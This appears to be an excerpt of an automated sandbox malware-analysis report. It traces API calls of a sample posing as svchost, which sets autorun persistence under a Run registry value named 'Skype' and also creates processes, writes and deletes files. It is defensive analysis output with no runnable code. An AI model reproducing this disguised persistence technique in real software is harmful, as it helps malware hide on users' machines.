      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(?), ref: 006733CF
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 006733F3
      • RegSetValueExA.ADVAPI32(?,Skype,00000000,00000001,?,000000FF), ref: 00673414
      • RegCloseKey.ADVAPI32(?), ref: 0067341F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(0067B270), ref: 0067343E
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90 ref: 00673457
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(006767F4,00000000), ref: 0067346B
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,?), ref: 00673483
      • memset.MSVCR90 ref: 00673492
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000001), ref: 006734BE
      • CreateProcessA.KERNEL32(00000000,?,00000000,00000001), ref: 006734C5
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006734DA
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006734EF
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673504
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673519
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673531
      Strings
      • Skype, xrefs: 0067340E
      • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 006733E9
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?erase@?$basic_string@A?$basic_string@V12@$?find@?$basic_string@CloseCreateOpenProcessV01@@Valuememset
      • String ID: Skype$Software\Microsoft\Windows\CurrentVersion\Run\
      • API String ID: 3308417156-1863297580
      • Opcode ID: 35701b0b768a497a100906a90ad4eacb96cfb38f612700d1661271ab218a5a48
      • Instruction ID: cf79b5342b070b540a136c1cb4d33ee2238a9a1bc9fa65810dc60e7b74660de8
      • Opcode Fuzzy Hash: 35701b0b768a497a100906a90ad4eacb96cfb38f612700d1661271ab218a5a48
      • Instruction Fuzzy Hash: 95413A71108781DFD738DB60DD49BEEBBA6BB94705F00991CF69E82291EB702548CB62
      APIs
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(AED9119B,?,?,?,006757ED,000000FF), ref: 0067102F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,006757ED,000000FF), ref: 00671040
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,006757ED,000000FF), ref: 00671050
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,006757ED,000000FF), ref: 00671060
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(0067A5E8,0000001C,00000064,6E6B5E81,6E6B5EBB,00679AF8,0000001C,00000064,6E6B5E81,6E6B5EBB,00679008,0000001C,00000064,6E6B5E81,6E6B5EBB), ref: 006710D1
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676226,?,?,?,006757ED,000000FF), ref: 0067110C
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ,?,?,?,006757ED,000000FF), ref: 00671143
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??4?$basic_string@V01@
      • String ID:
      • API String ID: 1734405261-619786877
      • Opcode ID: 07daa531163dec9c8f9aae745856e4a5a2ae6627b13409d51c809af7b0c55b23
      • Instruction ID: e21da36281f96aeac4e853011d67c8e5b5b5f63b5054052cbc7cbb15fb94844e
      • Opcode Fuzzy Hash: 07daa531163dec9c8f9aae745856e4a5a2ae6627b13409d51c809af7b0c55b23
      • Instruction Fuzzy Hash: BE316F70185780DED308DF58EE49B2A7F93E754754F04610CF26D5B2E2CB745988CB22
      APIs
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90 ref: 006736E2
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001), ref: 006736FB
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(00000000), ref: 00673706
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00673717
      • atoi.MSVCR90(00000000), ref: 0067371E
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673732
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673744
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673756
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?erase@?$basic_string@?find@?$basic_string@A?$basic_string@V01@@V12@atoi
      • String ID:
      • API String ID: 1924340847-0
      • Opcode ID: 854a296480e036e77eae4c2837e8d3b5bc0557c827a8f2020c443203465a377a
      • Instruction ID: 4f35a771f70b7ac2cae9211a63ce3930bf90a9ffb994c677df8efb226b88d396
      • Opcode Fuzzy Hash: 854a296480e036e77eae4c2837e8d3b5bc0557c827a8f2020c443203465a377a
      • Instruction Fuzzy Hash: 6E214F711187409FD348DF24D949B5ABBE6FB48724F505A1CF46B832E0DB709588CB52
      APIs
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(AED9119B,?,?,0067573E,000000FF), ref: 006711B6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(00679008,0000001C,00000064,6E6B5EBB,00679AF8,0000001C,00000064,6E6B5EBB,0067A5E8,0000001C,00000064,6E6B5EBB,?,?,0067573E,000000FF), ref: 00671213
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,0067573E,000000FF), ref: 00671223
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,0067573E,000000FF), ref: 00671233
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,0067573E,000000FF), ref: 00671246
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
      • String ID:
      • API String ID: 2599707790-0
      • Opcode ID: cc86b25533abe7b63f9f2a9732107ebb3eb1952b5ed88d75bfccfc95032b673b
      • Instruction ID: d8dc9fd92dd5329d82311df09a86a196d54b0e71461770863f4067b36ee6ff1f
      • Opcode Fuzzy Hash: cc86b25533abe7b63f9f2a9732107ebb3eb1952b5ed88d75bfccfc95032b673b
      • Instruction Fuzzy Hash: C7110D702887819FE314DF64C909B2A7F97FB85718F049A0CF6AE4B3D1CBB559448B62
      APIs
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90 ref: 00673632
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001), ref: 0067364B
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(00000001), ref: 00673658
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(00676226), ref: 00673667
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 0067367E
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@?erase@?$basic_string@?find@?$basic_string@V01@@V12@
      • String ID:
      • API String ID: 1645203866-0
      • Opcode ID: ba4ed0dae86490f4ecfaa2a587851660c322285cd1e8953bb6d325d08bfe19b6
      • Instruction ID: 56f911745f31d272a51bd61228378bb35edc96078b7706996b4d4cc1d643c09c
      • Opcode Fuzzy Hash: ba4ed0dae86490f4ecfaa2a587851660c322285cd1e8953bb6d325d08bfe19b6
      • Instruction Fuzzy Hash: 73115B70218B01AFD308CF14DA49B5ABBE6FB88B08F40891DF45E82290DB749A49CB52
      APIs
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,AED9119B,00000000,00675699,000000FF,00672550,?,?,?,AED9119B), ref: 00671322
      • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,AED9119B), ref: 00671332
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,AED9119B), ref: 0067133F
      • SendMessageA.USER32(00010404,0000000C,00000000,00000000), ref: 00671351
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,AED9119B), ref: 00671363
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@Y?$basic_string@$??1?$basic_string@A?$basic_string@MessageSendV01@@
      • String ID:
      • API String ID: 1882697028-0
      • Opcode ID: cf8e06204b1622231198e4fff93f93fa06a6819f8673ef61c4339dd3fe2c331e
      • Instruction ID: c57ae5645f241763619de473df01676ac6d10cddf4e2c559c28caadcab9b6af0
      • Opcode Fuzzy Hash: cf8e06204b1622231198e4fff93f93fa06a6819f8673ef61c4339dd3fe2c331e
      • Instruction Fuzzy Hash: B1011D71184B41EFD318CF54ED09B167BE6F748B21F40861DF56A872D0DB755844CB22
      APIs
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(006767F8,00000000,AED9119B,00000000,00675699,000000FF,00674921), ref: 00673593
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000001), ref: 0067359F
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006735B6
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006735CE
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?find@?$basic_string@A?$basic_string@
      • String ID:
      • API String ID: 3537960175-0
      • Opcode ID: b332bf2382da389d797507e7cc8c7bead75e0f16fb089898eedff633845bfde5
      • Instruction ID: f097d236f88164046db5748efa0a8483d088ebba8d8ded9a4293710486d6e03a
      • Opcode Fuzzy Hash: b332bf2382da389d797507e7cc8c7bead75e0f16fb089898eedff633845bfde5
      • Instruction Fuzzy Hash: 38016D75148B41EFD319CF10E945BA6BBE5FB44B24F408A1DF86A833D0DB386909CE12
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      Memory Dump Source
      • Source File: 00000001.00000002.2839141968.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000001.00000002.2839102079.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839178588.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839211875.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.2839245070.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$?erase@?$basic_string@A?$basic_string@V12@
      • String ID:
      • API String ID: 2190450286-0
      • Opcode ID: fa93ef78d61d64ccf72e1ea9c45cc9b6814993184e7e7f75f1b9dda328232232
      • Instruction ID: c35aa7d35afb36ee549a630c16142986ea6d2514db1d53bd0ee38f8990fec35c
      • Opcode Fuzzy Hash: fa93ef78d61d64ccf72e1ea9c45cc9b6814993184e7e7f75f1b9dda328232232
      • Instruction Fuzzy Hash: 9CF0C970704E009FEB69DB18EA58B3E77A7EB45B00F001548F44EC72A1CB64AD848B65

      Execution Graph

      Execution Coverage:12.1%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:0%
      Total number of Nodes:652
      Total number of Limit Nodes:22
      execution_graph 1566 675261 _except_handler4_common 1570 675c60 1575 671000 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1570->1575 1572 675c65 1578 674d15 1572->1578 1576 671086 1575->1576 1577 6710c7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 1576->1577 1577->1572 1581 674c70 1578->1581 1580 674d22 1588 675208 1581->1588 1583 674c7c _decode_pointer 1584 674c93 _onexit 1583->1584 1585 674c9f 7 API calls 1583->1585 1586 674d03 __onexit 1584->1586 1589 674d0c _unlock 1585->1589 1586->1580 1588->1583 1589->1586 1597 671669 1598 671670 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1597->1598 1598->1598 1599 671695 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1598->1599 1600 6716d6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1599->1600 1601 6716fd 1599->1601 1600->1600 1600->1601 1602 671705 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1601->1602 1603 67172a ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1601->1603 1602->1602 1602->1603 1604 67176b 1603->1604 1607 671797 1603->1607 1605 671770 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1604->1605 1605->1605 1605->1607 1606 6717c5 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1609 67182f 1606->1609 1610 671808 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1606->1610 1607->1606 1608 6717a0 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1607->1608 1608->1606 1608->1608 1611 671865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1609->1611 1612 671840 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1609->1612 1610->1609 1610->1610 1613 6718a6 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1611->1613 1614 6718cd 1611->1614 1612->1611 1612->1612 1613->1613 1613->1614 1615 6718d5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1614->1615 1616 6718fa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1614->1616 1615->1615 1615->1616 1617 671967 1616->1617 1618 67193d 1616->1618 1619 671995 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1617->1619 1621 671970 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1617->1621 1620 671940 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1618->1620 1622 671a07 1619->1622 1623 6719de 1619->1623 1620->1617 1620->1620 1621->1619 1621->1621 1625 671a35 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1622->1625 1626 671a10 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fputc 1622->1626 1624 6719e0 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1623->1624 1624->1622 1624->1624 1627 671a56 1625->1627 1626->1625 1626->1626 1628 674bfc 7 API calls 1627->1628 1629 671a70 1628->1629 1636 671e79 1637 671e80 fgetc 1636->1637 1638 671e96 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1637->1638 1639 671f2f 1637->1639 1640 671ec6 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1638->1640 1641 671f4b fprintf fprintf 1638->1641 1642 671f34 feof 1639->1642 1643 671fb4 fprintf fprintf 1640->1643 1644 671edf 1640->1644 1645 67201a fprintf fprintf 1641->1645 1642->1637 1646 671f46 1642->1646 1643->1645 1647 671ee6 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fprintf 1644->1647 1648 671efe ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1644->1648 1650 671f18 memset 1644->1650 1649 672030 7 API calls 1645->1649 1646->1649 1647->1648 1648->1644 1648->1650 1651 6721a6 DeleteFileA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1649->1651 1650->1642 1652 674bfc 7 API calls 1651->1652 1653 6721e7 1652->1653 1657 675c40 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1658 674d15 _pre_cpp_init 10 API calls 1657->1658 1659 675c55 1658->1659 1660 674d4f 1661 674d73 ?terminate@ 1660->1661 1662 674d68 1660->1662 1663 674d7b __onexit 1661->1663 1132 674a30 1133 674a54 1132->1133 1134 674b12 1132->1134 1137 674ae6 BeginPaint EndPaint 1133->1137 1138 674a5a 1133->1138 1135 674b3b 1134->1135 1136 674b19 DefWindowProcA 1134->1136 1142 674b46 1135->1142 1143 674b89 DialogBoxParamA 1135->1143 1139 674bfc 7 API calls 1136->1139 1144 674bfc 7 API calls 1137->1144 1140 674a85 CreateWindowExA 1138->1140 1141 674a61 1138->1141 1146 674b35 1139->1146 1162 674500 7 API calls 1140->1162 1141->1136 1147 674a6a PostQuitMessage 1141->1147 1148 674b6e DestroyWindow 1142->1148 1149 674b4b DefWindowProcA 1142->1149 1151 674bfc 7 API calls 1143->1151 1145 674b0c 1144->1145 1152 674bfc 7 API calls 1147->1152 1154 674bfc 7 API calls 1148->1154 1153 674bfc 7 API calls 1149->1153 1156 674bae 1151->1156 1157 674a7f 1152->1157 1158 674b68 1153->1158 1159 674b83 1154->1159 1161 674ae0 1227 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 1162->1227 1164 6745c8 1165 671260 4 API calls 1164->1165 1166 6745d2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI sprintf 1165->1166 1167 671260 4 API calls 1166->1167 1168 674616 10 API calls 1167->1168 1169 674707 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 1168->1169 1170 6746bc RegCreateKeyA ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI RegSetValueExA RegCloseKey 1168->1170 1172 674730 fgetc 1169->1172 1171 671480 85 API calls 1170->1171 1173 674702 1171->1173 1174 674993 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D 1172->1174 1175 67474a ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 1172->1175 1177 6749d7 1173->1177 1176 6749a2 feof 1174->1176 1230 6712f0 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI SendMessageA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1175->1230 1176->1172 1179 6749b6 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 1176->1179 1231 671480 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI fopen 1177->1231 1179->1177 1181 674771 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 1183 6747af ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 